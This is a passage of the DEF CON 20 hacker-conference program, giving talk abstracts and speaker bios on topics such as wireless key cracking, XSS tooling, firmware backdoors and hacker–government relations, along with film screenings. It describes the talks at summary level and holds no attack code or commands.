Welcome & Making the
DEF CON 20 Badge
The Dark Tangent Founder, DEF CON and Black Hat
LosT Designer of the DC 20 Badges
More info to come.
DEF CON Documentary Trailer
Jason Scott Director, DEF CON Documentary
As you may have heard, in honor of our 20th anniversary, we have a DEF
CON Documentary in the making by none other than Jason Scott of
textfiles.com! At the beginning of this hour he will give you a quick
sneak peek of the film and maybe discuss a few juicy tidbits!
Before, During, and After
Gail Thackeray
Former Assistant Attorney General and Special Counsel,
Arizona Attorney General's Office
Dead Addict
When Gail Thackeray first spoke at DEF CON 1 there was no world wide web, state-sponsored
computer warfare was the stuff of science fiction, and
international mafias had yet to become major players in computer
crime. Internationally known for her role in Operation Sundevil, the
former prosecuting attorney will discuss the changes in the computer
security legal landscape since she first spoke at DEF CON. She will
also discuss the evolution of the relationship between the computer
security researcher community and law enforcement and government.
Twenty years ago, Dead Addict practically begged Gail Thackeray to
appear at DEF CON, even though she was actively prosecuting several of
his close friends. Since then the government (law enforcement,
military, and intelligence community) has actively participated in DEF
CON; to the point where we’ve been given the moniker ‘FED CON’. Dead
Addict will discuss the evolving relationship between government, the
hacker community, and the civil liberties community. While obviously
at odds with each other in some areas, there is also shared ground
between these groups. This year he was happy to be able to invite Gail
again, this time not begging as much, and thankfully she isn't
prosecuting any of his friends.
Following their talk, Gail and Dead Addict will give a special introduction to our Special
Guest Speaker [REDACTED], [REDACTED] of the [REDACTED] and [REDACTED].
Gail Thackeray is a former Assistant Attorney General and Special
Counsel recently retired from the Arizona Attorney General's Office.
Her career prosecuting electronic crimes included the investigation
and prosecution of early infrastructure attacks on a telephone network
and a power company, as well as numerous fraud, cyberstalking and
intrusion crimes. She participated in the nationwide Secret Service
hacker investigation known as "Operation Sundevil" and attended the
first Defcon Conference. She currently works at the Arizona Counter
Terrorism Information Center as a computer forensic examiner. She has
a B.A. from Vassar College, a J.D. from Syracuse University, and
earned the CFCE forensics certification from the International
Association of Computer Investigative Specialists (IACIS).
20 years ago, Dead Addict helped organize
the first DEF CON. He has been part of the staff ever since. In the years since DEF CON began,
DA has worked for companies large and small, helping secure mobile platforms, operating systems,
and financial infrastructures. In addition to being given the opportunity to speak at DEF
CON, Shmoocon, Black Hat, Notacon and others, he constantly feels privileged at the company he has
been able to keep. He is currently a wandering rōnin and aspiring curmudgeon that can be reached at
da@defcon.org or daddict@gmail.com.
DC 101 Thursday Talks
10:00 Breaking Wireless Encryption Keys DaKahuna
Cracking wireless encryption keys is a fundamental capability that should be in every
penetration tester's skill set. This talk will walk you through the basic steps necessary to break Wireless
Encryption Protocol (WEP) and the steps to perform dictionary and brute-force attacks against Wi-Fi Protected
Access (WPA & WPA2).
DaKahuna works as a Systems Engineer for a small defense contractor in
the Washington DC metro area. By day he works with large government agencies reviewing network and security architectures,
reviewing information assurance and information security policies and guidance, and advising on matters of policy and
governance. By night he enjoys snooping the airwaves, be it the amateur radio bands or his neighbors' wireless networks.
He is a father of two, a 24-year Navy veteran and holder of an amateur radio Extra Class license.
11:00 Intro to Digital Forensics: Tools & Tactics Ripshy, Hackajar
Putting up a flag and asking for help on the Internet is not for the faint of heart.
When you simply want to get started with information security, hacking or just playing around with the
vulnerabilities of computer systems, asking the right question to the right person is a crap shoot.
Tired of being on the outside looking in? This 101 talk will help you get your feet wet! It will
provide you the basic knowledge required when starting out in the InfoSec scene. Afraid to ask someone
what the best NMap toggles are? Can't even get your metasploit running? Having trouble decoding your
tcpdumps? We can help! Spend 50 min. with us and jump start the next 50 years of your life!
Ripshy is a long time tinkerer who has been a part of the DEF CON
community for the past 10 years, attending his first con at the Jail bait age of 15. He has worked in various
roles touching multiple points of the info sec rainbow, and is currently working with Sony PlayStation doing magical
things with little more than curiosity and a keyboard. Ripshy is an OG member of the Vegas 2.0 crew, a founding
member of GayHackers, and works as a goon in the DEF CON NOC.
Hackajar has been involved in DEF CON in one form or another for over a decade. He's a
founding member of Vegas 2.0, a Contest Goon, and the brains behind "The Summit". He currently heads a
Silicon Valley Hacker Space and various security shenanigans.
12:00 The Cerebral Source Code Siviak
YOU: are part of the problem. You should count yourself among the ranks of the unprepared. You are
under-educated and fooling yourself. You are sheep, you just don’t know any better… but ignorance is no excuse.
You know that much.
Navigating the world of Social Engineering is often portrayed with the image of “Jedi mind-tricks” and labeled with terms
like “The Art of Deception”… These are all just ploys to convey mysticism, sell books and add value to a skill based on
common sense, perception and the ability to think further than the end of your own nose.
It’s time to remove the wool and learn what Social Engineering is and how it works. Welcome to a crash course in the
oldest CLI…. Bring a helmet.
Siviak: A contributor to DEF CON for 14+ years and a geek for over 30, Siviak is
considered by some as a trusted* (*citation needed) authority in the area of Social Engineering, considered by others to be a
complete asshole and considered by himself, often.
Siviak has talked with, listened to, pontificated at, entertained, debated, challenged, hoodwinked, and
exchanged booze with a great number of us over the years. He is one of the originating voices behind the
Lackey Program, undisputed ruler of the Scavenger Hunt, winner of more black badges than any other
attendee in history and a proud member of 23b.
DEF CON 101
13:00
Panelists:
HighWiz Moderator
Pyr0
Roamer
Lockheed
AlxRogan
LoST
Flipper
DC101 is the Alpha to the closing ceremonies' Omega. It's the place to go to learn about the many facets of Con and to begin your Defconian Adventure. Whether you're a n00b or a long time attendee, DC101 can start you on the path toward maximizing your DEF CON Experiences.
HighWiz █████ █████ █████ ███ ████,
███████████ ██████████ ████.
██████ ████████ ████ ██ ████ ████████ ██ ██████████ ██████ █████████.
██ █████████ █████ ███████ ████ █████████ ███████. ███████ ███████ ███
██ ███ █████████ ████ █████████ █████ █████████. ███████ ██████ █████,
█████████ ██ █████████ ███, ████████ ██ █████. ███ ███ █████ █████
█████ █████████ ███████. █████████ ███████ ██████ ██████. ███████ ██
██████ ████, ██ ████████ █████. ███████ ██ ██████████ █████. █████████
█████████, █████ ███ ████████ █████████, █████ █████ ███████ ██████,
██ ████████████ ██████.
Pyr0 is the asshole who oversees the Contests
and Events at DEF CON. He's been attending since DEF CON 6 and a goon since DEF CON 7. One of
those 3 0 3 peoples and also rolls deep with Security Tribe. Loves good vodka, smart girls,
explosives, and big black . . . guns. Has the ability to tell a man to go to hell so that he
looks forward to the trip. ALSO:DONGS
Roamer is the Senior Goon in charge of the Vendor Area.
He has been on DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest the
first 4 years of its existence and has also run the slogan contest in the past. Roamer is the lead
guitarist in the Goon Band, Recognize (despite what you may read in Gm1's bio). Although having no
actual skills his ability to out-drink virtually every Goon and attendee under the table has gained
him massive prominence in the scene and elevated him to the lofty station you see him in today.
Lockheed is the Sr. Goon in charge of the DEF
CON Network Operations Group since DEF CON 4. Professionally, Lock has over 25 years of experience in
the technology field. He's had jobs ranging from lowly tech writer, mainframe operator, product
engineer, product marketing manager, and is currently Sr Director in charge of the Global IT
Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's been in
the video game industry for almost 10 years now.
AlxRogan was born and raised in the Oil and Gas industry,
and has worked (off and on) there since 1995. In his work experience, he has consulted for energy
generating companies, health care providers, US and local government, and education/research
institutions. He is currently the Information Security Architect for a mid-size oil and gas
company in Houston. He also enjoys mopery.
LoST: With a background in mathematics and robotics LosT spends his
free time between calculating how to take over the world and building the robots to accomplish it. Deciding to
teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON community
with Russ in an effort to get more people involved with hardware. Fearing competition LosT devised the
Mystery Challenge to confuse and confound those who would rise up against him- eventually becoming the
creator of the badges to that same end. Really he just wants to juggle and read books these days, or
watch MST3K with Tom.
Flipper is the new guy on the panel. DEF CON 19 was his first
DEF CON, and he was on the team that went on to victory in the Scavenger Hunt. Last year he applied his
experience from robotics competitions to survive several days of sleepless insanity. He is back again
this year to talk about the whole DEF CON experience from the perspective of a newcomer. His day job
finds him being an expert in underwater robotics.
Twitter: @NickFlipper
Flipper on G+
14:00 Screw the Planet, Hack the Job! Roamer, Lockheed, AlxRogan
Have you ever wondered how you can translate your mad skillz into an actual job? Does coming to
DEF CON even help you get there? Four members of the DEF CON staff will astound you with the stories of how they
took their experiences at DEF CON and turned them into the jobs of their dreams. Despite using their DEF CON
experiences to obtain these jobs, they represent four completely different industries: Government, Energy,
Health Care, and the Video Game Industry in a variety of different job functions. Learn from their experience
and find out what they look for (from the community?) when they need to fill positions in their respective industries.
Roamer is the Senior Goon in charge of the Vendor Area. He has been on
DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest the first 4 years of its
existence and has also run the slogan contest in the past. Roamer is the lead guitarist in the Goon Band,
Recognize (despite what you may read in Gm1's bio). Although having no actual skills his ability to
out-drink virtually every Goon and attendee under the table has gained him massive prominence in the
scene and elevated him to the lofty station you see him in today.
Lockheed is the Sr. Goon in charge of the DEF CON Network Operations Group since DEF CON 4.
Professionally, Lock has over 25 years of experience in the technology field. He's had jobs ranging from lowly
tech writer, mainframe operator, product engineer, product marketing manager, and is currently Sr Director in
charge of the Global IT Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's
been in the video game industry for almost 10 years now.
AlxRogan was born and raised in the Oil and Gas industry, and has worked (off and on)
there since 1995. In his work experience, he has consulted for energy generating companies, health care
providers, US and local government, and education/research institutions. He is currently the Information
Security Architect for a mid-size oil and gas company in Houston.
15:00 HF Skiddies Suck, Don't Be One. Learn Some Basic Python Terrence "tuna" Gareau
Fuck a bunch of skiddie tools acquired from bobo forums. One does not have to be a master
to write their own shit. Yoda said it best get off your dick and write yourself some Python (Just don't show
it to Highwiz he might bite it). Also always remember to stay in the wizard's good graces or you will find
yourself publicly humiliated. You can come to this talk and find out how to be humiliated publicly but also:
learn some Python from a hacker's perspective. Oh yea: Dongs, Schlongs, and Turds
Terrence "tuna" Gareau If drinking and getting fat was a job
Terrence “tuna” Gareau would be a rich and happy person. He has spent his years growing up with a terminal on
his dong. There is nothing more satisfying to this poor bloke than hacking something to find a new purpose or
use for it. This love for hacking has gone so far that he does not know how to interact with humans or the
opposite sex and has left him a 26 year old virgin.
16:00 Hacking the Hackers: How Firm is Your Foundation? LoST
Since this is DC101, I've got some things I want to get off my chest- a brief overview
of 'foundational' hacker knowledge that I personally believe all hackers should have or would want- from
subculture references to numerical oddities, this will be a meat space core dump of an ADD-OCD hacker.
(ADD-OCD: I'm constantly changing what I'm completely obsessed about.) Topics will include mathematics,
linguistics, programming, hardware, DEF CON, robotics, and more. A veritable cornucopia of fun. Or not.
LoST: With a background in mathematics and robotics LosT
spends his free time between calculating how to take over the world and building the robots to accomplish it.
Deciding to teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON
community with Russ in an effort to get more people involved with hardware. Fearing competition LosT devised
the Mystery Challenge to confuse and confound those who would rise up against him- eventually becoming the creator
of the badges to that same end. Really he just wants to juggle and read books these days, or watch MST3K with Tom.
14:10 Introduction to Lockpicking and Bypassing Physical Security Dr. Tran
Everyone relies on their locks to keep things secure. From front doors
to filing cabinets, they give us the sense of security that no one else can get inside without
the proper key. However, in reality, most locks can be picked trivially without any evidence of
exploitation. You will learn how and why lockpicking works as well as what manufacturers have done
to protect against such shenanigans.
Dr. Tran is a security professional in Switzerland by day,
but some say he’s a super-secret agent by night. He’s been tinkering and taking apart technology since
childhood, but hasn't necessarily figured out how to reassemble them. When Robert is not wrenching on motor
vehicles or traveling the world, he’s picking locks. He’s been an active member of TOOOL for over 3
years and has taught at conferences including Shmoocon, CarolinaCon, NotaCon, Security BSides, QuahogCon,
HOPE, & DEF CON.
Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director
Jeremy Zerechak Director, Code2600
DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. The filmmaker will be present and doing a Q & A after the screening! Check out code2600.com for more info!
About the film:
CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped
build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while
maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout
caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity
theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught
in the grips of a global technology takeover.
The Cast:
Bruce Schneier,
Chief Security Technology Officer, BT
Jeff Moss,
Founder Def Con and Black Hat
Marcus Ranum,
Chief Security Officer, Tenable Security
Jennifer Granick,
Civil Liberties Director, EFF
Dr. Bob Lash,
Original Member of the Homebrew Computer Club
Eric Michaud,
Founder, Pumping Station One
Gideon Lenkey,
Security, CEO RA Security Systems
Lorrie Cranor,
Cylab, Carnegie Mellon University
Phil Lapsley,
Phone Phreaking Expert, Author
Robert Vamosi,
Computer Security Journalist, Author
Wallace Wang,
Author, "Steal This Computer Book"
Gideon Lenkey,
Co-Founder, Ra Security Systems
Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors
Joe Kawasaki Writer/Director, Reboot
Sidney Sherman Producer, Reboot
Actors To Be Announced
We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is
a peek at the premise from an article on the film:
"Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social
and political concerns that arise from becoming more and more intertwined with the virtual.
In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand
and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she
is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending
zero-hour will bring."
We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along
with the screening! We'll have more info as this solidifies.
If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate
as well! Find more info at http://www.rebootfilm.com/scoreboard.
Movie Night with The Dark Tangent:
"We Are Legion: The Story
of the Hacktivists"
"We Are Legion: The Story of the Hacktivists” is a documentary that takes us inside the world of Anonymous,
the radical “hacktivist” collective that has redefined civil disobedience for the digital age. The
film explores the historical roots of early hacktivist groups like Cult of the Dead Cow and Electronic
Disturbance Theater and then follows Anonymous from 4chan to a full-blown movement with a global reach,
one of the most transformative of our time.
We might even get lucky and have some cast and crew in attendance for a short Q&A!
Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte
"MIT Mike" Aponte Former Member, MIT Blackjack Team
Join us for a screening of the hit movie "21" and stick around for a Q&A session with "MIT Mike" Aponte, the real-life inspiration for the character "Jason Fisher".
"MIT Mike" Aponte Mike Aponte is a world-renowned blackjack player, gaming consultant and professional speaker. Mike was the leader of the MIT Blackjack Team, a high stakes card-counting team that legally won millions at 21 using mathematics and an ingenious approach. Mike was one of the main characters in the New York Times bestseller, Bringing Down the House, which inspired the major motion picture, 21.
Drawing on 20 years of professional blackjack experience, Mike teaches players how to turn 21 into a lucrative money maker. Blackjack is unique because, unlike other casino games, it is a true game of skill. The decisions you make actually determine whether you will win or lose over the long run. The beauty of blackjack is that for every playing decision there is one and only one correct play, and for every betting decision there is one and only one optimal bet.
Professional blackjack is both an art and science. In addition to learning the optimal strategies you must also develop the skills in order to apply the knowledge effectively. Mike teaches his clients how to develop a high skill level using the same training methods and techniques he used when he managed the MIT Team. If you're tired of losing to the casinos or are entrepreneurial minded and seeking a new and exciting skill, Mike can help you turn blackjack into a winning investment.
Accomplishments:
In addition to being one of the MIT Blackjack Team's most successful players, Mike was also responsible for recruiting, player development and strategic analysis. In 2004, Mike won the first World Series of Blackjack championship competing against the best blackjack players in the world. Mike speaks professionally for corporations and universities and also consults on the mathematics of gaming.
Shared Values, Shared Responsibility
General Keith B. Alexander Commander, US Cyber Command
(USCYBERCOM) and Director, National Security Agency/Chief, Central Security Service (NSA/CSS)
We as a global society are extremely vulnerable and at risk for a catastrophic cyber event.
Global society needs the best and brightest to help secure our most valued resources in cyberspace:
our intellectual property, our critical infrastructure and our privacy. DEF CON has an important place in computer security.
It taps into a broad range of talent and provides an unprecedented diversity of experiences and expertise to solve tough problems.
The hacker community and USG cyber community share some core values: we both see the Internet as an immensely positive force; we
both believe information increases in value by sharing; we both respect protection of privacy and civil liberties;
we both believe in the need for oversight that fosters innovation, doesn’t pick winners and losers, and retains
freedom and flexibility; we both oppose malicious and criminal behavior. We should build on this common
ground because we have a shared responsibility to secure cyberspace.
General Keith B. Alexander is the Commander, U.S. Cyber Command (USCYBERCOM) and
Director, National Security Agency/Chief, Central Security Service (NSA/CSS). As Commander, USCYBERCOM, he oversees planning, coordinating and
conducting operations and defense of DoD computer networks. As Director, NSA/Chief, CSS, he oversees a DoD agency with national foreign
intelligence, combat support, and U.S. national security information system protection responsibilities. GEN Alexander holds a B.S. from the
U.S. Military Academy, an M.S. in Business Administration from Boston University, an M.S. in Systems Technology (Electronic Warfare) and an M.S.
in Physics from the Naval Postgraduate School, and an M.S. in National Security Strategy from the National Defense University.
Owning Bad Guys {And Mafia} With Javascript Botnets
Chema Alonso Security Researcher, Informatica64
Manu "The Sur" Penetration Tester, Informatica64
Man-in-the-middle attacks are still one of the most powerful techniques for owning machines.
In this talk, MITM schemes in anonymous services are going to be discussed. Then attendees will see how easily a
botnet using JavaScript can be created to analyze that kind of connection and some of the actions people behind
those services are doing... for real. It promises to be funny.
Chema Alonso is a security researcher with Informatica64, a Madrid-based
security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University
and Universidad Politécnica de Madrid. During his more than eight years as a security professional, he has
consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at
industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information
security conferences worldwide including Yahoo! Security Week, Black Hat Briefings, ShmooCON, DeepSec, HackCON,
Ekoparty and RootedCon - He is a frequent contributor on several technical magazines in Spain, where he is
involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking
techniques and FOCA.
Twitter: @chemaalonso
http://www.elladodelmal.com
www.informatica64.com
Manu has been working in all security areas since he got into Informatica64.
He is a security pentester, a developer coding on projects like FOCA and a very good security researcher in areas such as
Connection String Parameter Pollution attacks or malware. He has the honor of being the man behind some of the most
powerful "C# spaghetti lines" of FOCA.
The Darknet of Things, Building Sensor Networks That Do Your Bidding
Anch
Omega
The Internet of Things... It is coming. Wearing hardware that communicates across the Internet is
starting to become a reality, chips are getting smaller, and as a society we are connected all the time. Building
these devices is easier than we thought, and putting them onto a network that is ours... EVEN BETTER! Come
experience the Darknet of Things. Learn what we built, how we built it, and why. Learn how to get involved
with a new community project, and see what some of the DEF CON groups have been working on. Most importantly,
learn how you can connect to the Darknet of Things.
Anch - Just a lowly hacker out in Oregon, POC for DC503, Designer
of the Network, and happily connected to the matrix.
Twitter: @boneheadsanon
http://www.dcgdark.net
Omega - Hardware hacker extraordinaire. Member of DC503, Designer of things, and thinks he
should have taken the RED pill.
Drones!
Chris Anderson Editor-in-Chief, Wired Magazine
Thanks to the plummeting cost of powerful motion sensors
like those found in smartphones, the technology to create
military-class autopilots is available to all. Over the past five
years, the DIY Drones community has created a series of open source
unmanned aerial vehicles (UAV), from fully-autonomous planes,
helicopters, quadcopters, hexacopters, rovers and more, which cost
just a few hundred dollars -- less than 1% the cost of equivalent
military drones. As a result there are now more than 10,000 of them in
use -- more than the US Military. As DIY drones go mainstream, what
are the practical applications that will emerge, and the legal,
ethical and economic implications? How does open source change the
regulatory aspects of drones? And will the rise of "personal drones"
have a similar social impact as "personal computers" did?
Chris Anderson is the Editor in Chief of Wired. He is the author
of the New York Times bestsellers The Long Tail and FREE: The Future
of a Radical Price, and the forthcoming Makers: The New Industrial
Revolution. He is also founder of 3D Robotics, an open source robotics
company.
<ghz or bust: DEF CON
atlas 0f d00m c0rp0ration
Wifi is cool and so is cellular, but the real fun stuff happens below the GHz line.
Medical systems, mfg plant/industrial systems, cell phones, power systems, it's all in there!
atlas and some friends set out to turn pink girltech toys into power-systems-attack tools. Through several turns
and changes, the cc1111usb project was born, specifically to make attacking these systems easier for all of you.
With a $50 usb dongle, the world of ISM sub-GHz is literally at your fingertips.
New and improved! If you missed it at shmoocon, here's your chance to see the intro to this fun new world.
If you caught it at shmoo, come to the talk and prove your <ghz prowess and wirelessly hack a special pink girl's toy target!
atlas is a doer of stuff. Inspired by the illustrious sk0d0,
egged on by invisigoth of kenshoto, atlas has done a lot of said 'stuff' and lived to talk about it.
Whether he's breaking out of virtual machines, breaking into banks, or breaking into power systems,
atlas is always entertaining, educational and fun.
Twitter: @at1as
Blind XSS
Adam "EvilPacket" Baldwin Chief Security Officer, &yet
This talk will announce the release of and demonstrate the xss.io toolkit. xss.io is a platform to help ease cross-site
scripting (XSS) exploitation and, specifically for this talk, the identification of blind XSS vectors. Think drag-and-drop
exploits after XSS vuln identification. For blind XSS, xss.io is a callback and hook manager for intel collected by
executed payloads and by payloads that were accessed but not executed.
Adam "EvilPacket" Baldwin has over 10 years of mostly
self-taught computer security experience and currently is the Chief Security Officer at &yet. He at one
time possessed a GCIA and, if his CPEs are up to date, should still have a CISSP. Prior to starting at &yet,
Adam operated a security consultancy, nGenuity, and worked for Symantec. Adam is a minor contributor to the W3AF
project, creator of the DVCS pillaging toolkit and of helmet, the security header middleware for node.js, and has
previously spoken at DEF CON, Toorcon, Toorcamp, Djangcon, and JSconf.
Twitter: @adam_baldwin
http://evilpacket.net
Should the Wall of Sheep Be Illegal? A Debate Over Whether and How Open WiFi Sniffing Should Be Regulated
Kevin Bankston Senior Counsel & Director of Free Expression, Center for Democracy & Technology
Matt Blaze Director, Distributed Systems Lab at the University of Pennsylvania
Jennifer Granick General Counsel, Worldstar, LLC
Prompted by the Google Street View WiFi sniffing scandal, the question of whether and how the law regulates interception of unencrypted wireless communications has become a hot topic in the courts, in the halls of the FCC, on Capitol Hill, and in the security community. Are open WiFi communications protected by federal wiretap law, unprotected, or some strange mix of the two? (Surprise: it may be the last one, so you'll want to come learn the line between what's probably illegal sniffing and what's probably not.)
More importantly, what *should* the law be? Should the privacy of those who use WiFi without encryption be protected by
law, or would regulating open WiFi sniffing pose too great a danger to security research and wireless innovation, not to
mention DEF CON traditions like the Wall of Sheep? Do we need to protect the sheep from the hackers, or the hackers from
the law, or can we do both at the same time? Join legal expert Kevin Bankston and technical expert Matt Blaze as they
square off in a debate to answer these questions, moderated by Jennifer Granick. (Surprise: the lawyer is the one arguing
for regulation.)
Kevin Bankston is Senior Counsel and Director of the Free Expression Project at
the Center for Democracy & Technology, a Washington, DC-based non-profit organization dedicated to promoting democratic
values and constitutional liberties in the digital age. Prior to joining CDT in February 2012, he was a Senior Staff
Attorney for the Electronic Frontier Foundation (EFF) specializing in free speech and privacy law with a focus on
government surveillance, Internet privacy, and location privacy. At EFF, he regularly litigated issues surrounding
location privacy and electronic surveillance, and was a lead counsel in EFF’s lawsuits against the National Security
Agency and AT&T challenging the legality of the NSA’s warrantless wiretapping program. From 2003-05, he was EFF's
Equal Justice Works/Bruce J. Ennis Fellow, studying the impact of post-9/11 anti-terrorism surveillance initiatives on
online privacy and free expression. Before joining EFF, he was the Justice William J. Brennan First Amendment Fellow
for the American Civil Liberties Union, where he litigated Internet-related free speech cases. He received his J.D.
in 2001 from the University of Southern California and his undergraduate degree from the University of Texas.
Twitter: @kevinbankston
http://www.cdt.org
Matt Blaze directs the Distributed Systems Lab at the University of
Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.
Twitter: @mattblaze
http://www.crypto.com
Jennifer Granick is the General Counsel of Worldstar, LLC. Prior to joining
WorldStarHipHop, Granick was an attorney at ZwillGen PLLC from 2010-2012 and the Civil Liberties Director at the
Electronic Frontier Foundation from 2007-2010. Previously, Granick served as the Executive Director of the Center for
Internet and Society at Stanford Law School where she was a lecturer in law. She founded and directed the Law School's
Cyberlaw Clinic where she supervised students in working on some of the most important cyberlaw cases that took place
during her tenure. She is best known for her work with intellectual property law, free speech, privacy, and other
things relating to computer security, and has represented several high profile hackers.
Twitter: @granick
http://www.granick.com
Cryptohaze Cloud Cracking
Bitweasil Lead Developer, Cryptohaze Tools
Bitweasil goes through the latest developments in the Cryptohaze GPU-based password
cracking suite. WebTables is a new rainbow table technology that eliminates the need to download
rainbow tables before using them, and the new Cryptohaze Multiforcer is an open source, GPLv2, network
enabled platform for password cracking that is easy to extend with new algorithms for specific targets.
The Cryptohaze Multiforcer supports CUDA, OpenCL, and CPU code (SSE, AVX, etc.). All of this is aimed at
either the pentester who can't spray hashes to the internet, or the hacker who would rather not broadcast
what she obtained to pastebin scrapers.
Bitweasil is the primary developer on the open source
Cryptohaze tool suite, which implements network-clustered GPU accelerated password cracking (both brute
force & rainbow tables). He has been working with CUDA for over 4 years (since the first public release
on an 8800GTX), OpenCL for the past 2 years, and enjoys SSE2 as well. Bitweasil also rescues ferrets.
Twitter: @Bitweasil
http://www.cryptohaze.com
Overwriting the Exception Handling Cache Pointer - Dwarf Oriented Programming
Rodrigo Rubira Branco Vulnerability & Malware Research Labs, Qualys
James Oakley Programmer
Sergey Bratus Research Ass't Professor, Comp. Science, Dartmouth College
This presentation describes a new technique for abusing the DWARF exception handling architecture used
by the GCC tool chain. This technique can be used to exploit vulnerabilities in programs compiled with or linked to
exception-enabled parts. Exception handling information is stored in bytecode format, executed by a virtual machine
during the course of exception unwinding and handling. We show how a malicious attacker could gain control of those
structures and inject bytecode for malicious purposes. This virtual machine is actually Turing-complete, which means
that it can be made to run arbitrary attacker logic.
Rodrigo Rubira Branco (BSDaemon) is the Director of Vulnerability & Malware
Research at Qualys. In 2011 he was honored as one of the top contributors to Adobe Vulnerabilities in the past 12 months.
Previously, as the Chief Security Researcher at Check Point he founded the Vulnerability Discovery Team (VDT) and released
dozens of vulnerabilities in many important software products. Prior to that, he worked as Senior Vulnerability Researcher at
COSEINC, as Principal Security Researcher at Scanit and as Staff Software Engineer in the IBM Advanced Linux Response
Team (ALRT), also working in the IBM Toolchain (Debugging) Team for the PowerPC Architecture. He is a member of the RISE
Security Group and is the organizer of the Hackers to Hackers Conference (H2HC), the oldest security research conference
in Latin America. He has been an accepted speaker at many security and open-source events, such as H2HC, HITB, XCon, VNSecurity,
OLS, DEF CON, Hackito, Ekoparty, Troopers and others.
James Oakley came to computer programming by way of microcontroller
programming. He enjoys hands-on work with low level systems. His interests include computer graphics, digital
electronics, security, and operating systems. In his unprofessional time he enjoys backpacking, science fiction,
and designing games. He graduated from the Computer Science program at Dartmouth College.
Sergey Bratus is a Research Assistant Professor of Computer Science at
Dartmouth College. He tries to help fellow academics to understand the value and relevance of hacker research.
He enjoys wireless and wired network hacking, kernel rootkits and hardening patches, and spoke on various topics
at Shmoocon, Toorcon, DEF CON, and Black Hat. He has a Ph.D. in Mathematics from Northeastern University,
and worked at BBN Technologies on natural language processing research before coming to Dartmouth.
Twitter: @sergeybratus
Exploit Archaeology: Raiders of the Lost Payphones
Josh Brashars Penetration Tester, Member DC 949
Payphones. Remember those? They used to be a cornerstone of modern civilization,
available at every street corner, gas station, or any general place of commerce. For decades, hackers
and phone phreaks crowded around them as an altar to high technology and a means to "reach out and touch someone".
Fast forward to today: most people have mobile phones. Payphones installed decades earlier are now more
of a memorial to a time long gone by. Covered with grime and graffiti, forgotten, relegated to the realm
of drug dealers and other undesirables. But they're still around, and they're more vulnerable
than ever.
This talk will review modern hacking techniques applied to retro hardware. We'll cover owning payphones and
how they can be retrofitted with new technologies to turn them into the ultimate low profile hacking platform
to compromise your organization's network. There will be demos of payphone hacking on stage, as well as using
the payphone to intercept voice phone traffic. We'll also reveal a new tool to automate the exploitation of
payphones and relate how (as with all forms of archaeology) learning about old platforms can help us secure
modern architecture.
Joshua Brashars is a penetration tester
and a member of DC949. He prefers to break things instead of make them.
Joshua has presented at several notable security conferences, including
Toorcon San Diego, Toorcon Seattle, Thotcon, Baythreat and HOPE. Joshua
has also contributed to several titles with Syngress Publishing.
Twitter: @savant42
Hardware Backdooring is Practical
Jonathan Brossard Toucan System
This presentation will demonstrate that permanent backdooring of hardware is practical.
We have built a generic proof of concept malware for the Intel architecture, Rakshasa, capable of infecting
more than a hundred different motherboards. The first net effect of Rakshasa is to disable NX permanently
and remove SMM related fixes from the BIOS, resulting in a permanent lowering of the security of the backdoored
computer, even after complete erasing of hard disks and reinstallation of a new operating system. We shall
also demonstrate that preexisting work on MBR subversions such as bootkiting and preboot authentication
software bruteforce can be embedded in Rakshasa with little effort. Moreover, Rakshasa is built on top of
free software, including the Coreboot project, meaning that most of its source code is already public. This
presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC
embedded on the motherboard, before detailing the inner workings of Rakshasa and demonstrating its capabilities.
The talk aims to raise the security community's awareness of the dangers associated with the non open
source firmware shipped with any computer, and to question its integrity. This should also result in
upgrading the best practices for forensics and post intrusion analysis by including the aforementioned
firmware as part of their scope of work.
Jonathan Brossard is a security research engineer. Born in France,
he has lived in Brazil and India, and currently works in Australia. With about 15 years of practice
in assembly, he is specialised in low level security, from raw sockets to cryptography and memory corruption
bugs. He is currently working as CEO and security consultant at the Toucan System security company. His
clients include some of the biggest Defense and Financial Institutions worldwide. Jonathan is also the
co-organiser of the Hackito Ergo Sum conference (HES) in France.
Twitter: @endrazine
Facebook: toucansystem
DIY Electric Car
Dave Brown
Electric Vehicles are an exciting area of developing technology entering
the mainstream market. Every major manufacturer is working on new hybrid and electric vehicles
but prices will be high and options few for years to come.
As with many industries, a DIY approach can yield similar results for much less cost, while creating
something truly unique.
This talk will explore the possibilities and procedures involved in creating your own electric vehicle.
Topics addressed will include the whys and hows, with an emphasis on the options available to tailor your
conversion to match your time, budget, and performance needs.
Dave Brown is an IT Security Consultant with Booz Allen Hamilton. In
his free time he tries to build stuff, and is particularly interested in alternative energy. In 2010 he converted
a ’74 VW Beetle to run on electricity, improving performance and eliminating the need to gas up.
Tenacious Diggity: Skinny Dippin' in a Sea of Bing
Francis Brown Managing Partner - Stach & Liu, LLC
Rob Ragan Senior Security Associate - Stach & Liu, LLC
